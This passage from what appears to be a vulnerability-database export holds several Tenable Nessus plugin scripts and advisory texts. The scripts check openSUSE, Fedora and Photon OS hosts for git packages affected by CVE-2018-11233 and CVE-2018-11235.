script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-arch-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-cvs-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-daemon-2.16.4-lp150.2.3.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE15.0\", reference:\"git-daemon-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debugsource-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-email-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-gui-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-p4-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-web-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"gitk-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-arch-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-core-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-core-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-credential-gnome-keyring-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-credential-gnome-keyring-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-cvs-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-daemon-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-daemon-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-debugsource-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-email-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"git-gui-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-svn-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-svn-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-web-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"gitk-2.13.7-13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:54", "description": "Upstream security fixes related to .gitmodules handling. From the [upstream announcement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct .c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of concept from which the test script was adapted goes to Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233). 
```\n\nAlso fix a segfault in rev-parse with invalid input (#1581678) and install contrib/diff-highlight (#1550251).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-04T00:00:00", "type": "nessus", "title": "Fedora 27 : git (2018-080a3d7866)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:git", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-080A3D7866.NASL", "href": "https://www.tenable.com/plugins/nessus/110299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-080a3d7866.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110299);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-080a3d7866\");\n\n script_name(english:\"Fedora 27 : git (2018-080a3d7866)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security fixes related to .gitmodules handling. 
From the\n[upstream\nannouncement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct\n.c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules\n file, but we blindly append them to $GIT_DIR/modules to\n create our on-disk repo paths. This means you can do bad\n things by putting '../' into the name. We now enforce\n some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of\n concept from which the test script was adapted goes to\n Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks\n paths on NTFS into reading random piece of memory\n (CVE-2018-11233). ```\n\nAlso fix a segfault in rev-parse with invalid input (#1581678) and\ninstall contrib/diff-highlight (#1550251).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-080a3d7866\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"git-2.14.4-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:53:04", "description": "An update of {'git'} packages of Photon OS has been released.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Photon OS update (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0145.NASL", "href": "https://www.tenable.com/plugins/nessus/111273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0145. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111273);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_bugtraq_id(104345, 104346);\n\n script_name(english:\"Photon OS update (deprecated)\");\n script_summary(english:\"Checks the package version of Git on PhotonOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of {'git'} packages of Photon OS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-145\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c77e146\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 
2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"git-2.17.1-1.ph1\",\n \"git-debuginfo-2.17.1-1.ph1\",\n \"git-lang-2.17.1-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:53:17", "description": "An update of {'git'} packages of Photon OS has been released.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Photon OS 2.0 : git (PhotonOS-PHSA-2018-2.0-0053) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", 
"cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0053.NASL", "href": "https://www.tenable.com/plugins/nessus/111307", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0053. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111307);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_bugtraq_id(104345, 104346);\n\n script_name(english:\"Photon OS 2.0 : git (PhotonOS-PHSA-2018-2.0-0053) (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of {'git'} packages of Photon OS has been released.\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-53\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ba53177\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"git-2.17.1-1.ph2\",\n \"git-debuginfo-2.17.1-1.ph2\",\n \"git-lang-2.17.1-1.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-10-16T00:43:19", "description": "An update of the git package has been released.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Git PHSA-2018-1.0-0145", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0145_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/121844", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0145. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121844);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"Photon OS 1.0: Git PHSA-2018-1.0-0145\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-145.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", 
reference:\"git-debuginfo-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-debuginfo-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-lang-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-lang-2.17.1-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:05", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. 
